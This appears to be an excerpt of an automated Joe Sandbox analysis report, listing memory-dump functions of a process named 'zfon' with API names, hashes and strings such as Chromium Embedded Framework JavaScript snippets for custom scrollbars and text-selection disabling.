                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$strcmp
                                                                                                • String ID: 11d15b06c9fb87a76f83ad5fe91f22eb03edbef5
                                                                                                • API String ID: 62325521-612978255
                                                                                                • Opcode ID: 00777ec401509b1104b8a7025e521847e5b3ae9b9f89e0c9a7ebb204bc8de8d7
                                                                                                • Instruction ID: 9137e3c9df34cfa0472d8d1d6ca6e95796072c8461c1e11d7214cd86588feca2
                                                                                                • Opcode Fuzzy Hash: 00777ec401509b1104b8a7025e521847e5b3ae9b9f89e0c9a7ebb204bc8de8d7
                                                                                                • Instruction Fuzzy Hash: 73316D62B09B81C2DB54DF16D850169A3B0FF88FC5B888036DE9D477A8DF38D555C3A0
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF7F96FED30: cef_string_map_alloc.LIBCEF ref: 00007FF7F96FEDF0
                                                                                                  • Part of subcall function 00007FF7F96FED30: cef_string_map_alloc.LIBCEF ref: 00007FF7F96FEE28
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25C3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25D3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25E3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25F0
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96FECD0
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96FED08
                                                                                                Strings
                                                                                                • scene/custom-scrollbars, xrefs: 00007FF7F96FEC31
                                                                                                • var __scInternalExt = __scInternalExt || {};__scInternalExt.CustomScrollbar = function(activeCssColor, inactiveCssColor, widthCss, paddingCss) { activeCssColor = activeCssColor || 'rgba(89,115,143,1.0)'; inactiveCssColor = inactiveCssColor || 'rgba(51,74,99,, xrefs: 00007FF7F96FEC1F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturncef_string_map_alloc
                                                                                                • String ID: scene/custom-scrollbars$var __scInternalExt = __scInternalExt || {};__scInternalExt.CustomScrollbar = function(activeCssColor, inactiveCssColor, widthCss, paddingCss) { activeCssColor = activeCssColor || 'rgba(89,115,143,1.0)'; inactiveCssColor = inactiveCssColor || 'rgba(51,74,99,
                                                                                                • API String ID: 2776152272-265620315
                                                                                                • Opcode ID: a3ce841b2f0a1b0e1f12d88bbc3da7ce5e7b75dd28f52266e785bd797aa85a93
                                                                                                • Instruction ID: 86035ccc268e78a0a5e7e9b09c91db7383d0aa1de657f06673c0e9b494b2d9a8
                                                                                                • Opcode Fuzzy Hash: a3ce841b2f0a1b0e1f12d88bbc3da7ce5e7b75dd28f52266e785bd797aa85a93
                                                                                                • Instruction Fuzzy Hash: 9D31AF22A09B8291EB11EF14E880369A771FBC4798F944131E6AD03AF9EF3CD445CB60
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25C3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25D3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25E3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25F0
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96FEDF0
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96FEE28
                                                                                                Strings
                                                                                                • scene/disable-select, xrefs: 00007FF7F96FED51
                                                                                                • var __scInternalExt = __scInternalExt || {};__scInternalExt.DisableTextSelect = function() { var el = null; var ready = false; var init = function() { if (ready) { return true;} if (!el) { el = document.createElement('style'); i, xrefs: 00007FF7F96FED3F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                • String ID: scene/disable-select$var __scInternalExt = __scInternalExt || {};__scInternalExt.DisableTextSelect = function() { var el = null; var ready = false; var init = function() { if (ready) { return true;} if (!el) { el = document.createElement('style'); i
                                                                                                • API String ID: 3856544966-2350028965
                                                                                                • Opcode ID: 499257f57761436df129275114f696247c9856562f9705cf07a7c3b94c05bfd0
                                                                                                • Instruction ID: a1bfc1bd2e78424fe77b197ffbb79d8fbd07ffa43d6a790d4db081621bb16a9e
                                                                                                • Opcode Fuzzy Hash: 499257f57761436df129275114f696247c9856562f9705cf07a7c3b94c05bfd0
                                                                                                • Instruction Fuzzy Hash: 34319422609B8691EB11EF14E850369A7B1FBC5798F944135E6AD436F8EF3CC445C760
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFindNext$wcscpy_s
                                                                                                • String ID: .
                                                                                                • API String ID: 544952861-248832578
                                                                                                • Opcode ID: 43a92e4ae7719266fdf7f74a34bd58c0e5cd43bcc5b0d63a8c54a700c8cf6607
                                                                                                • Instruction ID: 56615fc15555a61d4ec349f0cffc447c4f9b76f370d8314c9a9436c579a671c6
                                                                                                • Opcode Fuzzy Hash: 43a92e4ae7719266fdf7f74a34bd58c0e5cd43bcc5b0d63a8c54a700c8cf6607
                                                                                                • Instruction Fuzzy Hash: 3C219366A0C6C1D1EFB09F19E8543B963A0EB487D0F448131DB8D47684DFBCE546D740
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: DecodePointerfreeterminate
                                                                                                • String ID: csm
                                                                                                • API String ID: 1319892530-1018135373
                                                                                                • Opcode ID: 6134b3d9ee8e42ecd0a282cc438d3bc65ec7692e143b46020cd19bf630b9a02f
                                                                                                • Instruction ID: 28d0d0dbb3f22e7d8742c925fccbe3f51e6f18d1f14435d5aa2c10c244dc43a8
                                                                                                • Opcode Fuzzy Hash: 6134b3d9ee8e42ecd0a282cc438d3bc65ec7692e143b46020cd19bf630b9a02f
                                                                                                • Instruction Fuzzy Hash: FA111D62D0EA8585EF659F2DD45423863A0EF45FE9F188235CF6D072A0CF2CD487C201
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrow$std::ios_base::failure::failure
                                                                                                • String ID: ios_base::badbit set
                                                                                                • API String ID: 1099746521-3882152299
                                                                                                • Opcode ID: 8835a64955ff740848f4301bfa056b50858cadad722b641384f192b5b9dc1ffd
                                                                                                • Instruction ID: e3c3c033d3bab00de16a9857e49cde8399b4879568ed5166c5154684538fc0f9
                                                                                                • Opcode Fuzzy Hash: 8835a64955ff740848f4301bfa056b50858cadad722b641384f192b5b9dc1ffd
                                                                                                • Instruction Fuzzy Hash: F301FD21E2C9C692FF249F2CD4117BA2261DF80BC4F284035DB2E45995EE6EEA078610
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8BFAD3524: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00007FF8BFAD1222), ref: 00007FF8BFAD3564
                                                                                                • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFAD12A6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549530455.00007FF8BFAD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8BFAD0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549435771.00007FF8BFAD0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                • Associated: 00000005.00000002.2549570951.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                • Associated: 00000005.00000002.2549677238.00007FF8BFAD8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                • Associated: 00000005.00000002.2549715751.00007FF8BFAD9000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfad0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abortterminate
                                                                                                • String ID: MOC$RCC$csm
                                                                                                • API String ID: 661698970-2671469338
                                                                                                • Opcode ID: 0aa23b011ebb7a1bca7b1b5cf97d93ad35b1e0d7ec6c205f0ee7290f04a45704
                                                                                                • Instruction ID: 684bacdf53ff7b741daac7ede5873c5be5463720947c9a0c69bb2c7d6f17d6c5
                                                                                                • Opcode Fuzzy Hash: 0aa23b011ebb7a1bca7b1b5cf97d93ad35b1e0d7ec6c205f0ee7290f04a45704
                                                                                                • Instruction Fuzzy Hash: C8F0AF3E91860A87E7386B98E18206877F8FF49BC8F08B070D708422D2CF3CD5A0CA00
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8BFB56E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BFB529EE), ref: 00007FF8BFB56E56
                                                                                                • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB52A8E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abortterminate
                                                                                                • String ID: MOC$RCC$csm
                                                                                                • API String ID: 661698970-2671469338
                                                                                                • Opcode ID: 3ab94ae7472f91afbfb2fa40e8eaefdcfa6935c471aaf11af4776549d32657f7
                                                                                                • Instruction ID: 3a169f9bc03c5a54b9ccd961e9b3fed8cfa373b3823a7e47e47856a0bf8de5e0
                                                                                                • Opcode Fuzzy Hash: 3ab94ae7472f91afbfb2fa40e8eaefdcfa6935c471aaf11af4776549d32657f7
                                                                                                • Instruction Fuzzy Hash: E9F0493292961786E7A46BE9E19206D37A4EF8CB81F199035D74806652CF3CF4A0CB01
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID:
                                                                                                • API String ID: 1294909896-0
                                                                                                • Opcode ID: e9784d97df34b852811b729b75ab69608f0340d97476c982831835ccf36363d0
                                                                                                • Instruction ID: 9d39dcc8576e7e48c05903a96489429fe56820ab47bde3fcfb7a58083eb5d219
                                                                                                • Opcode Fuzzy Hash: e9784d97df34b852811b729b75ab69608f0340d97476c982831835ccf36363d0
                                                                                                • Instruction Fuzzy Hash: EA513E36B49F4181EB01EF28D89826873B5FB44B94F544636CB2D473A8EF39C854C764
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: strcspn$_invalid_parameter_noinfo_noreturnlocaleconvmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 1669350605-0
                                                                                                • Opcode ID: 97cef294c8234e24996934a69e811e08a35bd6dc2cc65fa79cb0f422811af0d6
                                                                                                • Instruction ID: e18b5922b50408db306d4f56e8fa841925b4b105ad7a4f77919a9005a99b0daf
                                                                                                • Opcode Fuzzy Hash: 97cef294c8234e24996934a69e811e08a35bd6dc2cc65fa79cb0f422811af0d6
                                                                                                • Instruction Fuzzy Hash: 00E19B26B18A86D9EF119F69C4442AC6BB1FB68B84F544132DF4D57BA4EF3CD64AC300
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: strcspn$_invalid_parameter_noinfo_noreturnlocaleconvmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 1669350605-0
                                                                                                • Opcode ID: b568904929ef177ea3e5454489a4b32e3a5935e52dbc23fadad983666b9a9220
                                                                                                • Instruction ID: 4c22434ac7fd3ffe52c534d17d1d1e4fd6fe933afb57cc81890880823bc60e9a
                                                                                                • Opcode Fuzzy Hash: b568904929ef177ea3e5454489a4b32e3a5935e52dbc23fadad983666b9a9220
                                                                                                • Instruction Fuzzy Hash: 3AE19722B18A82D9EF119F69D4442AC67B1BB58BC8F644132DF4D53BA4EF3CD64AC300
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID:
                                                                                                • API String ID: 1294909896-0
                                                                                                • Opcode ID: 5e4904112bc70dfaf0cd0831b4c3e5b204e79148fe6a76846035a198c2a67414
                                                                                                • Instruction ID: 7c205dc031f8362b1782294a1390928d186fe21c07b3eebf3757d025a0ba783a
                                                                                                • Opcode Fuzzy Hash: 5e4904112bc70dfaf0cd0831b4c3e5b204e79148fe6a76846035a198c2a67414
                                                                                                • Instruction Fuzzy Hash: B501A72195D98181DB12FF20D84537CA3B5FB84BB8F905630DA3D4A5DDCF39D49183A9
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+
                                                                                                • String ID:
                                                                                                • API String ID: 2943138195-0
                                                                                                • Opcode ID: 3527a2ec92af913d7f7e1f06c3a52e2048bea7df529658eb449da16ed24f77af
                                                                                                • Instruction ID: 914d556eb92d3d2b1f0ee1a7fed63a094c28d980585fcad89cc1256fdeb88462
                                                                                                • Opcode Fuzzy Hash: 3527a2ec92af913d7f7e1f06c3a52e2048bea7df529658eb449da16ed24f77af
                                                                                                • Instruction Fuzzy Hash: F6916962E08A5699FB118FE8D8603BCB7B5BB04788F544036DF4D2B699DF7CA846C340
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3041573648-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3041573648-0
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID: H
                                                                                                • API String ID: 1294909896-2852464175
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$malloc
                                                                                                • String ID:
                                                                                                • API String ID: 2675522757-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3041573648-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3041573648-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesctypestd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 2716750221-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___lc_codepage_func___lc_locale_name_func__pctype_funcislower
                                                                                                • String ID:
                                                                                                • API String ID: 2234106055-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: isspace$free$CloseEventHandlemallocmemcpy
                                                                                                • String ID:
                                                                                                • API String ID: 902297528-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___lc_codepage_func___lc_locale_name_func__pctype_funcisupper
                                                                                                • String ID:
                                                                                                • API String ID: 3857474680-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+$Replicator::operator[]
                                                                                                • String ID:
